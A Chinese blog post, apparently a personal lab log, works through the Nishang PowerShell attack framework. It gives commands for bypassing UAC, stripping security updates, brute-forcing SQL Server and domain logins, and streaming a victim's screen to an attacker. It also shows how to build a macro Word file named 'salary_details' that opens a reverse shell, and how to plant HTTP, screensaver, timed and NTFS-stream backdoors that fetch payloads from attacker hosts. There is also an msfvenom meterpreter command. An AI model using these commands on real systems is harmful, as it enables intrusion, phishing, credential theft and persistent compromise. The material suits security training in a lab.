但是我这都是windows的payload，反复连接，反复出错，只见session数一直增加，并且也有把reverse_tcp改成reverse_http和reverse_https 也没有成功。

 

4.5.2：bypass uac

user account control（用户账户控制）是微软为提高系统安全而在windows vista 中引入的新技术，它要求用户在执行可能会影响计算机或其他用户设置的操作之前，提供权限或管理员密码。通过在这些操作执行前对其进行验证，在未经许可的情况下，uac可以防止恶意软件和间谍软件在计算机上进行安装或计算机进行更改。

安全控制策略分为三个等级：

• 高等级：进程具有管理员权限
• 中等级：进程拥有一个基本用户的权限
• 低等级：进程的权限受各种限制，用来保证在系统受到威胁时，使损害保持在最小。

uac需要授权的动作包括：

• 配置window update
• 增加或删除用户账户
• 改变用户的账户类型
• 改变uac设置
• 安装activex
• 安装或卸载程序
• 安装设备驱动程序
• 设置家长控制
• 将文件移动或复制到program files或windows目录
• 查看其他用户的文件夹

uac有四种设置要求：

• 始终通知：这是最严格的设置，任何时候，当有程序要使用高级别权限时，都会提示本地用户
• 仅在程序试图更改我的计算机时通知我：这是uac的默认设置。本地windows程序要使用高级别权限时，不通知用户。但当第三方程序要求使用高级别权限时，会提示本地用户。
• 仅在程序试图更改我的计算机时通知我（不降低桌面亮度）：与上一条设置的要求相同，但提示用户时不降低桌面亮度。
• 从不提示：当用户为系统管理员时，所有程序都会以最高权限运行。

 
invoke-psuacme模块
该模块使用了来自uacme项目的dll来绕过uac，作用是绕过uac，nishang中给出的方法非常全面，列出了各种绕过uac的方法，如下图，可以在invoke-psuacme中指定相应的方法来执行。

方法名	将dll写入	dll名字	可用于的程序
sysprep	c:\windows\system32\sysprep\	cryptabase.dll 对于windows7，shcore.dll 对于windows8	c:\windows\system32\sysprep\sysprep.exe
oobe	c:\windows\system32\oobe\	wdscore.dll 对于windows7,8和10	c:\windows\system32\oobe\setuppsqm.exe
actionqueue	c:\windows\system32\sysprep	actionqueue.dll仅仅对于windows7	c:\windows\system32\sysprep\sysprep.exe
migwiz	c:\windows\system32\migwiz\	wdscore.dll对于windows7和windows8	c:\windows\system32\migwiz.exe
cliconfg	c:\windows\system32\	ntwdblib.dll 对于windows7,8，10	c:\windows\system32\cliconfg.exe
winsat	c:\windows\system32\sysprep\copywinsat.exe from c:\windows\system32\to c:\windows\system32\sysprep\	ntwdblib.dll 对于windows7 devobj.dll对于 windows8、10	c:\windows\system32\sysprep\winsat.exe
mmc	c:\windows\system32\	ntwdblib 对于windows7 elsext.dll 对于windows8 和10	c:\windows\system32\mmc.exe eventvwr

查看源码：

invoke-psuacme -verbose		# 使用sysprep方法并执行默认的payload
invoke-psuacme -method oobe -verbose			# 使用oobe方法并执行默认的payload
invoke-psuacme -method oobe -payload "powershell-windowstyle hidden -e xxx"			# xxx 代表你的编码后的payload，如上图。

 

4.5.3：删除补丁

这个脚本可以帮助我们移除系统所有的更新或所有安全更新，以及指定编号的更新。
可以在cmd命令行输入systeminfo查看补丁安装情况

remove-update all		# 移除目标机器上的所有更新
remove-update security		# 移除目标机器上的所有与安全相关更新
remove-update kb2761226		# 移除指定编号的更新

 

4.5.4：其他功能

1、端口扫描（invoke-portscan）

invoke-portscan是nishang的端口扫描脚本，它用于发现主机、解析主机名、端口扫描，是实战中一个很实用的脚本。

具体的参数介绍如下：

• startaddress # 扫描范围开始的地址
• endaddress # 扫描范围结束的地址
• scanport # 进行端口扫描
• port # 指定扫描端口
• timeout # 设置超时时间

个人感觉速度有点慢。

 

2、爆破破解（invoke-bruteforce）

invoke-bruteforce是nishang中专注于暴力破解的脚本，它用于对sql server、域控制器、web及ftp弱口令爆破。

ps > invoke-bruteforce -computername sqlserv01 -userlist c:\test\users.txt -passwordlist c:\test\wordlist.txt -service sql -verbose
爆破sql server
ps > invoke-bruteforce -computername targetdomain -userlist c:\test\users.txt -passwordlist c:\test\wordlist.txt -service activedirectory -stoponsuccess -verbose
爆破域控制器
ps > invoke-bruteforce -computername targetmachine -userlist c:\test\users.txt -passwordlist c:\test\wordlist.txt -service localaccounts -stoponsuccess -verbose
指定了用户名和字典，又因为设置了 stoponsuccess，因此暴力强制在第一次成功时停止。
.example
ps > cat c:\test\servers.txt | invoke-bruteforce -userlist c:\test\users.txt -passwordlist c:\test\wordlist.txt -service sql -verbose
爆破server.txt中所有servers的sql server

 

3、嗅探

内网嗅探的使用方法比较简单，但是动静很大，在实在没有办法的时候，可以尝试一下。
在目标机器上执行以下命令：

invoke-interceptor -proxyserver 192.168.152.130 -proxyport 3128

然后再kali上，监听3128端口。netcat -lvvp 3128

这里书本上没有写详细，我还一直在这里等待，等半天没有反应，【捂脸】

打开源码发现，其实需要用到浏览器设置代理的问题。

我以火狐为例：

然后在浏览器输入网址

 

4、屏幕窃取

show-targetscreen 脚本使用mjpeg传输目标机的远程桌面的实时画面，在本机可以使用nc或者powercat进行监听。在本地使用支持mjpeg的浏览器（如firefox）访问本机对应监听端口，即可在浏览器上看到从远端传输回来的实时画面，正向反向均可。

攻击者kali（ip:192.168.152.130）：nc -nvlp 4456 | nc -nvlp 9000
受害者win10：show-targetscreen -ipaddres 192.168.152.130 -port 4456 -reverse

受害者将自己的桌面传输到攻击者的4456端口，攻击者把监听转移到9000端口，用浏览器查看截图结果

画面试试显示：

然后我又试了一下，把自己的真实机当作受害者。 好家伙，无限实时套娃，把cpu干满了。。【捂脸】

如果攻击者kali只写这个命令：``nc -nvlp 4456`，则右边窗口画面一直在乱码滚动。

 

5、生成木马

nishang 中还有各种脚本，它们可以感染各种文件，如hta、word，用于执行powershell脚本，可以神不知鬼不觉的发动攻击，此脚本的所有类型如下图所示。

参数介绍：

参数	说明
payload	后面直接加payload，需要注意引号的闭合（注意这句话，后面有个坑）
payloadurl	传入远程的payload进行生成
payloadscript	指定本地的脚本进行生成
arguments	之后将要执行的函数（得是payload有的函数）
outputfile	输出的文件名
wordfiledir	输出的目录地址
recurse	在wordfiledir中递归寻找word文件
removedocx	创建完成后删除原始文件

各个脚本的使用方法基本相同，这里以生成受感染的word为例。
首先输入指令，监听4444端口。nc -lvp 4444
接着制作word文件，打开nishang\shells\invoke-powershelltcponeline.ps1这个文件，复制第三行的内容，可以看到中间有一个tcpclient的参数，这里就是远程连接的地址了。

这里需要将这个地址和端口改成本机的ip和你监听的端口，改完以后复制该代码，在命令行下输入以下命令。

invoke-encode -datatoencode '复制的代码' -isstring -postscript

注意，复制的代码外边的引号，一开始报错，找了半天也找不到啥，网上我也没找到这一小节内容，后来喝了杯水突然发现，如果是单引号的话会导致，引号的闭合出现问题，所以改用了双引号，运行成功。

并且有些地方很坑，比如下面这个图，这里用单引号就完全没有问题，红框里面用的是双引号。

执行完成之后，会在当前目录下生成两个文件，encoded.txt，encodedcommand.txt

接着执行out-word -payloadscript .\encodedcommand.txt，
以为大功告成了，然后一大串报错，人麻了

输入下列指令，模块不兼容

此处，假装接着执行out-word -payloadscript .\encodedcommand.txt成功
那么就会在当前文件夹下生成一个名为salary_details的doc文件。目标用户打开word以后，会反弹shell，在启用宏的计算机上没有任何提示，未启用宏的计算机会有启用宏的提示。

 

6、后门

1、http-backdoor
http-backdoor可以帮助我们在目标机器上下载和执行powershell 脚本，接收来自第三方网站的指令，然后在内存中执行powershell脚本。

http-backdoor -checkurl http://xxx -payloadurl http://yyy -magicstring start123 -stopstring stopthis
checkurl：给出一个url地址，如果存在，magicstring中的值就执行payload来下载、运行我们的脚本
payloadurl：给出需要下载的powershell脚本的地址
arguments：指定要执行的函数
stopstring：判断是否存在checkurl返回的字符串，如果存在则停止执行。

 

2、add-scrnsavebackdoor
该脚本可以帮助我们利用windows的屏保来留一个隐藏的后门
下面是源码举例的内容

.example
ps > add-scrnsavebackdoor -payloadurl http://192.168.254.1/firebuster.ps1 -arguments "firebuster 192.168.254.1 8440-8445"
use above to execute firebuster from nishang for egress testing.
.example
ps > add-scrnsavebackdoor -payloadurl http://192.168.254.1/powerpreter.psm1 -arguments http-backdoor "http://pastebin/raw.php?i=jqp2vj3x http://pastebin/raw.php?i=zhyf8rwh start123 stopthis
use above to execute http-backdoor from powerpreter
.example
ps > add-scrnsavebackdoor -payloadurl http://192.168.254.1/code_exec.ps1
use above to execute an in-memory meterpreter in powershell format generated using msfvenom 
(./msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.254.226 -f powershell)

 

3、execute-ontime
该脚本可以在目标机上指定powershell脚本的执行时间，与http-backdoor的使用方法相似，只不过多了定时功能。

ps > execute-ontime -payloadurl http://pastebin/raw.php?i=zhyf8rwh -arguments get-information -time hh:mm -checkurl http://pastebin/raw.php?i=zhyf8rwh -stopstring stoppayload
使用来自非交互式 shell 的有效负载时，请使用上述内容。
payloadurl：指定脚本下载的地址
arguments：指定执行的函数
time：设定脚本执行的时间（例如：-time 23:21）
checkurl：会检测一个指定的url内容里是否存在stopstring给出的字符串，如果发现了就会停止执行。

 
4、invoke-adsbackdoor
这个脚本使用ntfs数据流留下一个永久性的后门。可以向ads中注入代码并且以普通用户的权限执行，输入以下命令即可执行该脚本。

ps > invoke-adsbackdoor -payloadurl http://192.168.1.138/payload.ps1
使用上面的命令在 payload.ps1中建立永久性

执行该脚本后，如果目标用户手动找，根本找不到任何东西，使用命令dir /a /r才能看到被写入的文件。

 
 
 

五：总结

这一节内容太累了，各种报错，各种少文件，各种不兼容，你能看到这里 我也是服了你了。。

溜了溜了~~~~，有机会再续补内容~~~~

本文标签：